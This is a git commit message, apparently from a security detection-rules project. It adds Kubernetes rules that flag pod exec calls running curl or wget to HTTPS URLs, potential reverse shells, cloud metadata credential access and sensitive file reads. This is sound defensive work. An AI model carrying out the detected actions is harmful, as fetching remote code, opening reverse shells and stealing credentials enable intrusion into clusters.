Samirbous
e4746c3a83
* [New] Kubernetes Pod Exec with Curl or Wget to HTTPS Detects pod or attach `exec` API calls where the decoded request query implies curl or wget fetching an https URL (avoid noisy local http services). * Create execution_kubernetes_pod_exec_potential_reverse_shell.toml * Update execution_kubernetes_pod_exec_curl_wget_https.toml * Update execution_kubernetes_pod_exec_potential_reverse_shell.toml * ++ * ++ * Apply suggestion from @terrancedejesus Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com> * Apply suggestion from @terrancedejesus Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com> * Apply suggestion from @terrancedejesus Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com> * Apply suggestion from @terrancedejesus Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com> * Apply suggestion from @terrancedejesus Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com> * Apply suggestion from @terrancedejesus Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com> * Update execution_kubernetes_pod_exec_curl_wget_https.toml * Update execution_kubernetes_pod_exec_potential_reverse_shell.toml * Update credential_access_kubernetes_pod_exec_cloud_instance_metadata.toml * Update credential_access_kubernetes_pod_exec_sensitive_file_access.toml * Update execution_kubernetes_pod_exec_curl_wget_https.toml * Update credential_access_kubernetes_pod_exec_sensitive_file_access.toml * Update credential_access_kubernetes_pod_exec_cloud_instance_metadata.toml --------- Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com>